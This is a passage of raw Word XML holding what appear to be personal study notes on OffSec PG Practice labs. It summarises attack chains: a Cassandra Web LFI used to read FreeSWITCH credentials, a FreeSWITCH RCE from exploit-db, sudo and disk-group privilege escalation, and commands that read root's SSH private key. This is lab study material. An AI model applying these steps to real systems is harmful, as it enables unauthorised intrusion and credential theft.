      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:hyperlink r:id="rId1266">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used exploitDB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000397A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="915"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1267">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/47984</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000397B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="915"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:hyperlink r:id="rId1268">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used metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000397C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000397D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000397E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8ocy06xypwkf" w:id="539"/>
      <w:bookmarkEnd w:id="539"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cassandra-web and Cassandra Query Language (CQL)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000397F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003980">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We saw a Cassandra-web website on port 3000 of </w:t>
      </w:r>
      <w:hyperlink r:id="rId1269">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Clue</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice. And this writeup gives us a quick guide on how to use the CQL commands to enumerate the database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003981">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003982">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is another good </w:t>
      </w:r>
      <w:hyperlink r:id="rId1270">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Clue</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">writeup. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003983">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003984">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:hyperlink r:id="rId1271">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 first one), they:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003985">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="223"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Used Cassandra Web 0.5.0 exploit from </w:t>
      </w:r>
      <w:hyperlink r:id="rId1272">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">exploitdb</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for LFI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003986">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="223"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then they saw freeswitch-event on port 8021</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003987">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="223"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They try the freeswitch RCE from exploitDB but authentication doesn't work, so they need to find the right password (the script uses a hardcoded default password)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003988">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="223"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId1273">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/47799</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003989">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="223"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So then we were supposed to find out that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/freeswitch/autoload_configs/event_socket.conf.xml</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is where freeswitch credentials are stored</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000398A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="223"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So using LFI, we can read it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000398B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="223"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then now that they have credentials for freeswitch, they can use this freeswitch exploitdb RCE. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In order to do this, you need to edit the script and replace the default password "ClueCon" with your own password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000398C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="223"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1274">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/47799</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000398D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000398E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="223"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then for priv esc, they saw they could run /usr/local/bin/cassandra-web as sudo. It gets kind of messy, so you can read both witeups to see how they used it to get root. They used it to read SSH keys that were for another user but if you re-used them for root user than SSH worked. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000398F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003990">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003991">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is a hacktricks for Cassandra</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003992">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="303"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1275">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://book.hacktricks.wiki/en/network-services-pentesting/cassandra.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003993">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="303"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Apparently it's often seen in 9042/9160</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003994">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003995">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_df9ph4shucct" w:id="540"/>
      <w:bookmarkEnd w:id="540"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">disk group (6(disk))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003996">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003997">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Seen in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1276">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Fantastic</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice. They used the guide down below which teaches us how to enumerate which files we can view using this disk group</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003998">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1277">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://vk9-sec.com/disk-group-privilege-escalation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003999">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000399A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="4991100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="132" name="image142.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image142.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1278"/>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399B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">df -h</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tells us which files we can look at </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000399C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Beware of the "mounted on" which is the last column. This helps show you the full path to enumerate the files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000399D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And as you can see based on the "mounted on," the root directory (/) is mounted on /dev/sda2 so we should look there (as explained in the guide)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000399E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then it will ask us for a command, and we can run commands like reading root private key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000399F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /root/.ssh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or just:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
